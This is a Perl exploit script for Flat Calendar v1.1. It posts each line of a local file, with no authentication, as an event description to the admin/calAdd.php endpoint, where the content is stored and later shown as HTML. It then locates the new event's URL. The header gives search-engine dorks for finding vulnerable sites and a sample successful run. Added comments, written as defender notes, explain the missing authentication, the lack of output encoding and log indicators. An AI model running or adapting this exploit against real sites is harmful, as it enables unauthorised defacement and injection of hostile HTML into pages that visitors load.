#!/usr/bin/perl -w
#Title : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 08/12/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
#Dork2 : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://server /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://server / index.html ZoRLu
#Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://server
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709
use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;
# Clear the terminal, then print the usage line and two example invocations
# to STDOUT. Takes no arguments; $0 is interpolated as the script name.
sub hlp() {
    # Pick the platform's screen-clear command: 'cls' on Windows, 'clear' elsewhere.
    my $clear_cmd = 'clear';
    $clear_cmd = 'cls' if $^O eq 'MSWin32';
    system($clear_cmd);

    print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n",
          "Exam1: perl $0 http://server / index.html ZoRLu\n",
          "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n";
}
# Main flow of the proof of concept: read a local file line by line, submit
# each line as the `description` of a new calendar event through
# <url><path>admin/calAdd.php, then fetch calendar.php to report the number
# of the most recently listed event.
#
# Defender notes (what this script shows about the target application):
#  - The user agent below is created with no cookie jar, credentials or token,
#    and only six form fields are posted. A "Record Added" reply therefore
#    means the admin add-event endpoint accepted a write without any
#    authentication; it should require an authenticated admin session (and an
#    anti-CSRF token) before storing anything.
#  - `description` is sent exactly as read from the file. Per the script title
#    the stored value is later shown as HTML; the rendering code is not shown
#    here, but the fix belongs there: encode on output (htmlspecialchars in
#    PHP) rather than relying on input filtering alone.
#  - LWP::UserAgent->new without an `agent` override identifies itself as
#    "libwww-perl/<version>", so POSTs to admin/calAdd.php with that
#    User-Agent, or from clients that never logged in, stand out in web logs.

# Exactly four arguments are required; otherwise show the usage and stop.
if(@ARGV != 4) {
hlp();
exit();
}
my $ua = LWP::UserAgent->new;
# Positional arguments: base URL, calendar path, local input file, submitter name.
my $url = $ARGV[0];
my $path = $ARGV[1];
my $index = $ARGV[2];
my $nick = $ARGV[3];
# Endpoint that adds an event; built by plain concatenation, so $path must
# begin and end with "/" as in the usage examples.
my $vuln = $url . $path . "admin/calAdd.php";
print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";
# The event is dated with the local current day, month name and year.
my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
# localtime reports the year as an offset from 1900 and the month as 0..11.
my $year = 1900 + $yearset;
my $moon = $months[$month];
# NOTE(review): two-argument open. The open mode is parsed out of $index
# itself, so a name starting with ">" or ending with "|" would truncate a file
# or run a command on the operator's own machine. The three-argument form
# open(my $fh, '<', $index) removes that ambiguity.
if (open(my $fh, $index)) {
# One POST per input line: every line of the file becomes a separate event.
while (my $row = <$fh>) {
chomp $row;
# Form fields of the add-event request; `description` carries the raw line.
my $req = POST $vuln, [
event => 'Test Page',
description => $row,
month => $moon,
day => $day,
year => $year,
submitted => $nick,
];
my $resp = $ua->request($req);
if ($resp->is_success) {
my $message = $resp->decoded_content;
# Success is recognised only by this fixed text in the response body.
my $regex = "Record Added: taking you back";
if ($message =~ /$regex/) {
print "[+] Exploit Succes\n";
# A second, fresh user agent fetches the public calendar page.
my $newua = LWP::UserAgent->new( );
my $newurl = $url . $path . "calendar.php";
my $newreq = $newua->get($newurl);
if ($newreq->is_success) {
my $newmessage = $newreq->decoded_content;
# Last occurrence of the event link on the page; rindex returns -1 when
# the marker is absent, and that case is not checked here.
my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
print "[+] Searching url...\n";
# 26 is the length of the marker; a fixed 4 characters are taken after it,
# so a shorter id picks up following markup and a longer one is truncated.
# With $first == -1 this reads from offset 25 and the value is meaningless.
my $request = substr($newmessage, $first+26, 4);
print "[+] YourEventNumber = $request\n";
sleep(1);
print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
}
else {
# The failed request here is the GET of calendar.php, although the text says POST.
print "[-] HTTP POST error code: ", $newreq->code, "\n";
print "[-] HTTP POST error message: ", $newreq->message, "\n";
}
}
else {
# Success text missing from a 2xx response; printed without a trailing newline.
print "[-] Exploit Failed";
}
}
else {
# The POST itself returned a non-success status.
print "[-] HTTP POST error code: ", $resp->code, "\n";
print "[-] HTTP POST error message: ", $resp->message, "\n";
}
}
}
else {
# The input file could not be opened (the reason in $! is not reported).
sleep(1);
die ("[-] NotFound: $index\n");
}